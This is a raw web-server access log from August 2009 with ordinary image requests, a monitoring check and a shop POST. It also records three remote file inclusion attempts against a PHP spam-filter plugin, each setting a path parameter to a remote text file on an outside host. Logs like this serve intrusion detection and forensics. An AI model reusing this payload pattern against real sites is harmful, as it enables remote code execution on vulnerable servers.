203.236.100.30 - - [12/Aug/2009:08:20:36 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
79.69.38.223 - - [12/Aug/2009:08:20:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.69.38.223 - - [12/Aug/2009:08:20:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.69.38.223 - - [12/Aug/2009:08:21:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.69.38.223 - - [12/Aug/2009:08:21:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
203.236.100.30 - - [12/Aug/2009:08:21:07 -0400] "GET /logs/error_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:21:07 -0400] "GET /logs/access_log.Q109071700%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:08:21:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
160.141.91.53 - - [12/Aug/2009:08:19:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L012EC34E9E15E400AA13051+M37+ENG HTTP/1.1" 200 57687 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L012EC3449DE564006693051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50